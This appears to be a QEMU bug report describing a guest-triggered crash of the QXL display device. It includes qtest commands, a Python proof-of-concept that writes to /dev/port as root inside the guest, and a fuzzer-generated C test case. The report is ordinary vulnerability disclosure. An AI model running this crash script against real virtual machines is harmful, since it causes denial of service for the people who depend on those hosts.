1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
|
DoS via assert failure by guest user
Description of problem:
As root in guest VM user can execute special script, which crashes the whole VM with error
```plaintext
hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
```
Steps to reproduce:
1. This bug can be reproduced with:
```bash
cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
outl 0xcf8 0x8000101c
outl 0xcfc 0xc000
outl 0xcf8 0x80001001
outl 0xcfc 0x01000000
outl 0xc006 0x00
EOF
```
2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
```python
import os
f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
l = os.lseek(f, 0xcf8, 0)
os.write(f, b'\x80\x00\x10\x1c')
l = os.lseek(f, 0xcfc, 0)
os.write(f, b'\xc0\x00')
l = os.lseek(f, 0xcf8, 0)
os.write(f, b'\x80\x00\x10\x01')
l = os.lseek(f, 0xcfc, 0)
os.write(f, b'\x01\x00\x00\x00')
l = os.lseek(f, 0xc006, 0)
os.write(f, b'\x00')
```
This script causes VM to crash.
[PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)
Additional information:
This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
```plaintext
/*
* Autogenerated Fuzzer Test Case
*
* Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqtest.h"
/*
* cat << EOF | qemu-system-x86_64 -vga qxl -hda \
* ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
* outl 0xcf8 0x8000101c
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001001
* outl 0xcfc 0x01000000
* outl 0xc006 0x00
* EOF
*/
static void test_qxl_set_mode(void)
{
QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
qtest_outl(s, 0xcf8, 0x8000101c);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001001);
qtest_outl(s, 0xcfc, 0x01000000);
qtest_outl(s, 0xc006, 0x00);
qtest_quit(s);
}int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_init(&argc, &argv, NULL);
if (strcmp(arch, "x86_64") == 0) {
qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
}
return g_test_run();
}
```
|